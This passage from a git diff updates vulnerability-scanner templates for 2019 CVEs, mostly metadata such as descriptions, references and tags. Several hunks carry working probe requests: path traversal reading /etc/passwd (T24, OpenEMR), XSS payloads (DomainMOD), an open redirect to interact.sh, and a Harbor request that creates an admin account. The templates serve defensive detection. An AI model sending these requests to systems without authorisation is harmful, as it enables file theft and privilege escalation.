   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2019-13101
     cwe-id: CWE-306
-  tags: cve,cve2019,dlink,router,iot
+  tags: edb,cve,cve2019,dlink,router,iot
 
 requests:
   - raw:
diff --git a/cves/2019/CVE-2019-13392.yaml b/cves/2019/CVE-2019-13392.yaml
index c128c59f82..c2f949dc2e 100644
--- a/cves/2019/CVE-2019-13392.yaml
+++ b/cves/2019/CVE-2019-13392.yaml
@@ -4,8 +4,7 @@ info:
   name: MindPalette NateMail 3.0.15 Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request.
-    The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.
+  description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.
   reference:
     - https://www.doyler.net/security-not-included/natemail-vulnerabilities
     - https://mindpalette.com/tag/natemail/
diff --git a/cves/2019/CVE-2019-13396.yaml b/cves/2019/CVE-2019-13396.yaml
index 5d144e3dd6..50a702c171 100644
--- a/cves/2019/CVE-2019-13396.yaml
+++ b/cves/2019/CVE-2019-13396.yaml
@@ -1,20 +1,20 @@
 id: CVE-2019-13396
 
 info:
-  name: FlightPath Local File Inclusion
+  name: FlightPath - Local File Inclusion
   author: 0x_Akoko,daffainfo
-  severity: high
-  description: FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability.
+  severity: medium
+  description: FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion.
   reference:
     - https://www.exploit-db.com/exploits/47121
-    - https://www.cvedetails.com/cve/CVE-2019-13396/
+    - http://getflightpath.com/node/2650
     - https://nvd.nist.gov/vuln/detail/CVE-2019-13396
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2019-13396
     cwe-id: CWE-22
-  tags: cve,cve2019,flightpath,lfi
+  tags: cve,cve2019,flightpath,lfi,edb
 
 requests:
   - raw:
@@ -48,3 +48,5 @@ requests:
         internal: true
         regex:
           - "idden' name='form_token' value='([a-z0-9]+)'>"
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2019/CVE-2019-13462.yaml b/cves/2019/CVE-2019-13462.yaml
index 43dfa3704a..d4f49e9001 100644
--- a/cves/2019/CVE-2019-13462.yaml
+++ b/cves/2019/CVE-2019-13462.yaml
@@ -8,6 +8,8 @@ info:
   reference:
     - https://www.nccgroup.com/ae/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/
     - https://nvd.nist.gov/vuln/detail/CVE-2019-13462
+    - https://www.nccgroup.trust/uk/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/
+    - https://www.lansweeper.com/forum/yaf_topics33_Announcements.aspx
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
     cvss-score: 9.1
diff --git a/cves/2019/CVE-2019-14205.yaml b/cves/2019/CVE-2019-14205.yaml
index 8a69833a58..f70a84c306 100644
--- a/cves/2019/CVE-2019-14205.yaml
+++ b/cves/2019/CVE-2019-14205.yaml
@@ -1,19 +1,23 @@
 id: CVE-2019-14205
 
 info:
-  name: WordPress Ext Adaptive Images LFI
+  name: WordPress Nevma Adaptive Images <0.6.67 - Local File Inclusion
   author: pikpikcu
   severity: high
-  description: A Local File Inclusion vulnerability in the Nevma Adaptive Images plugin before 0.6.67 for WordPress allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file']
-    parameter in adaptive-images-script.php.
+  description: |
+    WordPress Nevma Adaptive Images plugin before 0.6.67 allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php.
   reference:
     - https://github.com/security-kma/EXPLOITING-CVE-2019-14205
+    - https://markgruffer.github.io/2019/07/19/adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.html
+    - https://wordpress.org/plugins/adaptive-images/#developers
+    - https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-14205
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2019-14205
     cwe-id: CWE-22
-  tags: cve,cve2019,wordpress,wp-plugin,lfi
+  tags: cve,cve2019,wordpress,wp-plugin,lfi,wp
 
 requests:
   - method: GET
@@ -23,11 +27,14 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "DB_NAME"
           - "DB_PASSWORD"
-        part: body
         condition: and
+
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/14
diff --git a/cves/2019/CVE-2019-14223.yaml b/cves/2019/CVE-2019-14223.yaml
index b2780cf573..52999cd8cd 100644
--- a/cves/2019/CVE-2019-14223.yaml
+++ b/cves/2019/CVE-2019-14223.yaml
@@ -25,10 +25,10 @@ requests:
       Content-Type: application/x-www-form-urlencoded
 
     body: |
-      success=%2Fshare%2Fpage%2F&failure=:\\example.com&username=baduser&password=badpass
+      success=%2Fshare%2Fpage%2F&failure=:\\interact.sh&username=baduser&password=badpass
 
     matchers:
       - type: regex
         part: header
         regex:
-          - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?example\\.com(?:\\s*)$"
\ No newline at end of file
+          - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"
\ No newline at end of file
diff --git a/cves/2019/CVE-2019-14251.yaml b/cves/2019/CVE-2019-14251.yaml
new file mode 100644
index 0000000000..721e75c0db
--- /dev/null
+++ b/cves/2019/CVE-2019-14251.yaml
@@ -0,0 +1,38 @@
+id: CVE-2019-14251
+
+info:
+  name: T24 Web Server - Local File Inclusion
+  author: 0x_Akoko
+  severity: high
+  description: T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server.
+  reference:
+    - https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt
+    - https://vuldb.com/?id.146815
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-14251
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2019-14251
+    cwe-id: CWE-22
+  tags: cve,cve2019,temenos,lfi,unauth
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd"
+      - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+          - "for 16-bit app support"
+        condition: or
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/13
diff --git a/cves/2019/CVE-2019-14312.yaml b/cves/2019/CVE-2019-14312.yaml
index 458752e8ef..582e6ef3a5 100644
--- a/cves/2019/CVE-2019-14312.yaml
+++ b/cves/2019/CVE-2019-14312.yaml
@@ -4,17 +4,18 @@ info:
   name: Aptana Jaxer 1.0.3.4547 - Local File inclusion
   author: daffainfo
   severity: medium
-  description: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via
-    a tools/sourceViewer/index.html?filename=../ URI.
+  description: Aptana Jaxer 1.0.3.4547 is vulnerable to local file inclusion in the wikilite source code viewer. An attacker can read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI.
   reference:
     - https://www.exploit-db.com/exploits/47214
-    - https://www.cvedetails.com/cve/CVE-2019-14312
+    - http://packetstormsecurity.com/files/153985/Aptana-Jaxer-1.0.3.4547-Local-File-Inclusion.html
+    - https://github.com/aptana/Jaxer/commits/master
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-14312
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 6.5
     cve-id: CVE-2019-14312
     cwe-id: CWE-22
-  tags: cve,cve2019,lfi
+  tags: cve,cve2019,lfi,edb,packetstorm
 
 requests:
   - method: GET
@@ -31,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2019/CVE-2019-14322.yaml b/cves/2019/CVE-2019-14322.yaml
index e908bde536..13eed465b9 100644
--- a/cves/2019/CVE-2019-14322.yaml
+++ b/cves/2019/CVE-2019-14322.yaml
@@ -1,19 +1,21 @@
 id: CVE-2019-14322
 
 info:
-  name: Odoo 12.0 - Local File Inclusion
+  name: Pallets Werkzeug <0.15.5 - Local File Inclusion
   author: madrobot
   severity: high
-  description: In Pallets Werkzeug before 0.15.5, SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames.
+  description: |
+    Pallets Werkzeug before 0.15.5 is susceptible to local file inclusion because SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames.
   reference:
     - https://palletsprojects.com/blog/werkzeug-0-15-5-released/
     - http://packetstormsecurity.com/files/163398/Pallets-Werkzeug-0.15.4-Path-Traversal.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-14322
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2019-14322
     cwe-id: CWE-22
-  tags: cve,cve2019,lfi,odoo
+  tags: cve2019,lfi,odoo,packetstorm,cve
 
 requests:
   - method: GET
@@ -25,13 +27,16 @@ requests:
     stop-at-first-match: true
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
+
       - type: word
+        part: body
         words:
           - "bit app support"
           - "fonts"
           - "extensions"
         condition: and
-        part: body
+
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/06/14
diff --git a/cves/2019/CVE-2019-14470.yaml b/cves/2019/CVE-2019-14470.yaml
index 67469e85a4..0671b8b409 100644
--- a/cves/2019/CVE-2019-14470.yaml
+++ b/cves/2019/CVE-2019-14470.yaml
@@ -1,19 +1,22 @@
 id: CVE-2019-14470
 
 info:
-  name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress UserPro 4.9.32 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: cosenary Instagram-PHP-API (aka Instagram PHP API V2), as used in the UserPro plugin through 4.9.32 for WordPress, has XSS via the example/success.php error_description parameter.
+  description: WordPress UserPro 4.9.32 is vulnerable to reflected cross-site scripting because the Instagram PHP API (v2) it relies on allows it via the example/success.php error_description parameter.
   reference:
     - https://wpscan.com/vulnerability/9815
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470
+    - http://packetstormsecurity.com/files/154206/WordPress-UserPro-4.9.32-Cross-Site-Scripting.html
+    - https://wpvulndb.com/vulnerabilities/9815
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-14470
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2019-14470
     cwe-id: CWE-79
-  tags: cve,cve2019,wordpress,xss,wp-plugin
+  tags: wordpress,xss,wp-plugin,wpscan,packetstorm,cve,cve2019
 
 requests:
   - method: GET
@@ -35,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/10
diff --git a/cves/2019/CVE-2019-14530.yaml b/cves/2019/CVE-2019-14530.yaml
new file mode 100644
index 0000000000..f5e1bdfac6
--- /dev/null
+++ b/cves/2019/CVE-2019-14530.yaml
@@ -0,0 +1,52 @@
+id: CVE-2019-14530
+
+info:
+  name: OpenEMR < 5.0.2 - Path Traversal
+  author: TenBird
+  severity: high
+  description: |
+    An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.
+  reference:
+    - https://www.exploit-db.com/exploits/50037
+    - https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-14530
+    - https://github.com/openemr/openemr/pull/2592
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2019-14530
+    cwe-id: CWE-22
+  metadata:
+    verified: "true"
+  tags: lfi,authenticated,edb,cve,cve2019,openemr
+
+requests:
+  - raw:
+      - |
+        POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1
+
+      - |
+        GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: word
+        part: header
+        words:
+          - filename=passwd
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2019/CVE-2019-14696.yaml b/cves/2019/CVE-2019-14696.yaml
index 3ce8f63d0f..2eea2b4949 100644
--- a/cves/2019/CVE-2019-14696.yaml
+++ b/cves/2019/CVE-2019-14696.yaml
@@ -1,18 +1,21 @@
 id: CVE-2019-14696
 
 info:
-  name: Open-Scool 3.0/Community Edition 2.3 - Cross Site Scripting
+  name: Open-Scool 3.0/Community Edition 2.3 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: Open-School 3.0, and Community Edition 2.3, allows XSS via the osv/index.php?r=students/guardians/create id parameter.
+  description: Open-School 3.0, and Community Edition 2.3, allows cross-site scripting via the osv/index.php?r=students/guardians/create id parameter.
   reference:
+    - https://open-school.org
+    - https://pastebin.com/AgxqdbAQ
+    - http://packetstormsecurity.com/files/153984/Open-School-3.0-Community-Edition-2.3-Cross-Site-Scripting.html
     - https://nvd.nist.gov/vuln/detail/CVE-2019-14696
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2019-14696
     cwe-id: CWE-79
-  tags: cve,cve2019,xss
+  tags: packetstorm,cve,cve2019,xss
 
 requests:
   - method: GET
@@ -28,3 +31,5 @@ requests:
         words:
           - '<script>alert(document.domain)</script>'
         part: body
+
+# Enhanced by mp on 2022/08/08
diff --git a/cves/2019/CVE-2019-14974.yaml b/cves/2019/CVE-2019-14974.yaml
index 3ff062576f..c98c3a4276 100644
--- a/cves/2019/CVE-2019-14974.yaml
+++ b/cves/2019/CVE-2019-14974.yaml
@@ -4,15 +4,16 @@ info:
   name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
   author: madrobot
   severity: medium
-  description: SugarCRM Enterprise 9.0.0 allows mobile/error-not-supported-platform.html?desktop_url= XSS.
+  description: SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url.
   reference:
     - https://www.exploit-db.com/exploits/47247
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-14974
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2019-14974
     cwe-id: CWE-79
-  tags: cve,cve2019,xss,sugarcrm
+  tags: cve2019,xss,sugarcrm,edb,cve
 
 requests:
   - method: GET
@@ -27,3 +28,5 @@ requests:
         words:
           - "url = window.location.search.split(\"?desktop_url=\")[1]"
         part: body
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-15107.yaml b/cves/2019/CVE-2019-15107.yaml
index f4aa348c35..8e9e449b72 100644
--- a/cves/2019/CVE-2019-15107.yaml
+++ b/cves/2019/CVE-2019-15107.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
     - https://nvd.nist.gov/vuln/detail/CVE-2019-15107
+    - https://www.exploit-db.com/exploits/47230
+    - http://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2019-15107
     cwe-id: CWE-78
-  tags: cve,cve2019,webmin,rce
+  tags: cve,cve2019,webmin,rce,kev,edb
 
 requests:
   - raw: #
diff --git a/cves/2019/CVE-2019-15501.yaml b/cves/2019/CVE-2019-15501.yaml
index d49c727674..8fb0d3fd1d 100644
--- a/cves/2019/CVE-2019-15501.yaml
+++ b/cves/2019/CVE-2019-15501.yaml
@@ -1,20 +1,20 @@
 id: CVE-2019-15501
 
 info:
-  name: LSoft ListServ - XSS
+  name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting
   author: LogicalHunter
   severity: medium
-  description: Reflected cross site scripting (XSS) in L-Soft LISTSERV before 16.5-2018a exists via the /scripts/wa.exe OK parameter.
+  description: L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
   reference:
     - https://www.exploit-db.com/exploits/47302
     - http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-15501
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2019-15501
     cwe-id: CWE-79
-  tags: cve,cve2019,xss,listserv
+  tags: cve,cve2019,xss,listserv,edb
 
 requests:
   - method: GET
@@ -36,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-15713.yaml b/cves/2019/CVE-2019-15713.yaml
index d05e3811c7..c306a57b37 100644
--- a/cves/2019/CVE-2019-15713.yaml
+++ b/cves/2019/CVE-2019-15713.yaml
@@ -14,7 +14,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2019-15713
     cwe-id: CWE-79
-  tags: cve,cve2019,wordpress,xss,wp-plugin
+  tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-15811.yaml b/cves/2019/CVE-2019-15811.yaml
new file mode 100644
index 0000000000..aacfeaf7fb
--- /dev/null
+++ b/cves/2019/CVE-2019-15811.yaml
@@ -0,0 +1,49 @@
+id: CVE-2019-15811
+
+info:
+  name: DomainMOD <=4.13.0 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters.
+  reference:
+    - https://www.exploit-db.com/exploits/47325
+    - https://github.com/domainmod/domainmod/issues/108
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-15811
+    - https://zerodays.lol/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2019-15811
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2019,domainmod,xss,authenticated,edb
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_username={{username}}&new_password={{password}}
+
+      - |
+        GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    redirects: true
+    max-redirects: 2
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains(all_headers_2, "text/html")'
+          - 'contains(body_2, "value=\"\"onfocus=\"alert(document.domain)\"autofocus=")'
+          - 'contains(body_2, "DomainMOD")'
+        condition: and
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-15858.yaml b/cves/2019/CVE-2019-15858.yaml
index 40a22d2f93..b5c14ada12 100644
--- a/cves/2019/CVE-2019-15858.yaml
+++ b/cves/2019/CVE-2019-15858.yaml
@@ -1,23 +1,22 @@
 id: CVE-2019-15858
 
 info:
-  name: Unauthenticated Woody Ad Snippets WordPress Plugin RCE
+  name: WordPress Woody Ad Snippets <2.2.5 - Cross-Site Scripting/Remote Code Execution
   author: dwisiswant0,fmunozs,patralos
   severity: high
   description: |
-    This template supports the detection part only. See references.
-
-    admin/includes/class.import.snippet.php in the "Woody ad snippets" plugin
-    before 2.2.5 for WordPress allows unauthenticated options import,
-    as demonstrated by storing an XSS payload for remote code execution.
+    WordPress Woody Ad Snippets prior to 2.2.5 is susceptible to cross-site scripting and remote code execution via admin/includes/class.import.snippet.php, which allows unauthenticated options import as demonstrated by storing a cross-site scripting payload for remote code execution.
   reference:
     - https://github.com/GeneralEG/CVE-2019-15858
+    - https://blog.nintechnet.com/multiple-vulnerabilities-in-wordpress-woody-ad-snippets-plugin-lead-to-remote-code-execution/
+    - https://wpvulndb.com/vulnerabilities/9490
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-15858
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2019-15858
     cwe-id: CWE-306
-  tags: cve,cve2019,wordpress,wp-plugin,xss
+  tags: cve,cve2019,wordpress,wp-plugin,xss,wp
 
 requests:
   - method: GET
@@ -26,22 +25,24 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
 
       - type: word
+        part: body
         words:
           - "2.2.5"
-        part: body
         negative: true
 
       - type: word
+        part: body
         words:
           - "Changelog"
-        part: body
 
       - type: word
+        part: body
         words:
           - "Woody ad snippets"
-        part: body
+
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/06/14
diff --git a/cves/2019/CVE-2019-15859.yaml b/cves/2019/CVE-2019-15859.yaml
index 0be7f93056..3f4801adcc 100644
--- a/cves/2019/CVE-2019-15859.yaml
+++ b/cves/2019/CVE-2019-15859.yaml
@@ -4,17 +4,18 @@ info:
   name: Socomec DIRIS A-40 Devices Password Disclosure
   author: geeknik
   severity: critical
-  description: Socomec DIRIS A-40 devices before 48250501 are susceptible to a password disclosure vulnerability in the web interface that could allow remote attackers to get full access to a device via the /password.jsn
-    URI.
+  description: Socomec DIRIS A-40 devices before 48250501 are susceptible to a password disclosure vulnerability in the web interface that could allow remote attackers to get full access to a device via the /password.jsn URI.
   reference:
     - https://seclists.org/fulldisclosure/2019/Oct/10
     - https://nvd.nist.gov/vuln/detail/CVE-2019-15859
+    - http://packetstormsecurity.com/files/154764/Socomec-DIRIS-A-40-Password-Disclosure.html
+    - https://www.socomec.com/single-circuit-multifunction-meters_en.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2019-15859
     cwe-id: CWE-200
-  tags: cve,cve2019,disclosure,socomec,diris,iot
+  tags: seclists,packetstorm,cve,cve2019,disclosure,socomec,diris,iot
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-15889.yaml b/cves/2019/CVE-2019-15889.yaml
index 112d784466..a804591c4d 100644
--- a/cves/2019/CVE-2019-15889.yaml
+++ b/cves/2019/CVE-2019-15889.yaml
@@ -1,13 +1,14 @@
 id: CVE-2019-15889
 
 info:
-  name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Download Manager <2.9.94 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
+  description: WordPress Download Manager plugin before 2.9.94 contains a cross-site scripting vulnerability via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
   reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
     - https://www.cybersecurity-help.cz/vdb/SB2019041819
+    - https://wordpress.org/plugins/download-manager/#developers
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-15889
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -35,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-16097.yaml b/cves/2019/CVE-2019-16097.yaml
index 241a3b7884..ed12c1a447 100644
--- a/cves/2019/CVE-2019-16097.yaml
+++ b/cves/2019/CVE-2019-16097.yaml
@@ -4,18 +4,18 @@ info:
   name: Harbor <=1.82.0 - Privilege Escalation
   author: pikpikcu
   severity: medium
-  description: Harbor 1.7.0 through 1.8.2 is susceptible to privilege escalation via core/api/user.go, which allows allows non-admin users to create admin accounts via the POST /api/users API when Harbor is setup
-    with DB as an authentication backend and allows user to do self-registration.
+  description: Harbor 1.7.0 through 1.8.2 is susceptible to privilege escalation via core/api/user.go, which allows allows non-admin users to create admin accounts via the POST /api/users API when Harbor is setup with DB as an authentication backend and allows user to do self-registration.
   reference:
     - https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/
     - https://github.com/goharbor/harbor/issues/8951
     - https://nvd.nist.gov/vuln/detail/CVE-2019-16097
+    - https://github.com/goharbor/harbor/commit/b6db8a8a106259ec9a2c48be8a380cb3b37cf517
+  remediation: Upgrade to v1.7.6 v1.8.3. v.1.9.0 or higher. A potential workaround without applying the fix is to configure Harbor to use a non-DB authentication backend such as LDAP.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
     cvss-score: 6.5
     cve-id: CVE-2019-16097
     cwe-id: CWE-862
-  remediation: Upgrade to v1.7.6 v1.8.3. v.1.9.0 or higher. A potential workaround without applying the fix is to configure Harbor to use a non-DB authentication backend such as LDAP.
   tags: cve,cve2019,intrusive,harbor
 
 requests:
@@ -25,7 +25,7 @@ requests:
     headers:
       Content-Type: application/json
     body: |
-      {"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"}
+      {"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@interact.sh", "realname": "poc"}
 
     matchers-condition: and
     matchers:
diff --git a/cves/2019/CVE-2019-16123.yaml b/cves/2019/CVE-2019-16123.yaml
index 891b8933e6..3078881e7b 100644
--- a/cves/2019/CVE-2019-16123.yaml
+++ b/cves/2019/CVE-2019-16123.yaml
@@ -1,19 +1,21 @@
 id: CVE-2019-16123
 
 info:
-  name: PilusCart <= 1.4.1 - Arbitrary File Retrieval
+  name: PilusCart <=1.4.1 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: PilusCart versions 1.4.1 and below suffers from a file disclosure vulnerability.
+  description: |
+    PilusCart versions 1.4.1 and prior suffer from a file disclosure vulnerability via local file inclusion.
   reference:
     - https://packetstormsecurity.com/files/154250/PilusCart-1.4.1-Local-File-Disclosure.html
-    - https://www.cvedetails.com/cve/CVE-2019-16123
+    - https://www.exploit-db.com/exploits/47315
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-1653
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2019-16123
     cwe-id: CWE-22
-  tags: cve,cve2019,piluscart,lfi
+  tags: piluscart,lfi,packetstorm,edb,cve,cve2019
 
 requests:
   - method: GET
@@ -30,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/17
diff --git a/cves/2019/CVE-2019-16278.yaml b/cves/2019/CVE-2019-16278.yaml
index 41f2580571..5ebfa0ba3d 100644
--- a/cves/2019/CVE-2019-16278.yaml
+++ b/cves/2019/CVE-2019-16278.yaml
@@ -9,12 +9,13 @@ info:
     - https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html
     - https://www.exploit-db.com/raw/47837
     - https://nvd.nist.gov/vuln/detail/CVE-2019-16278
+    - http://www.nazgul.ch/dev/nostromo_cl.txt
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2019-16278
     cwe-id: CWE-22
-  tags: cve,cve2019,rce
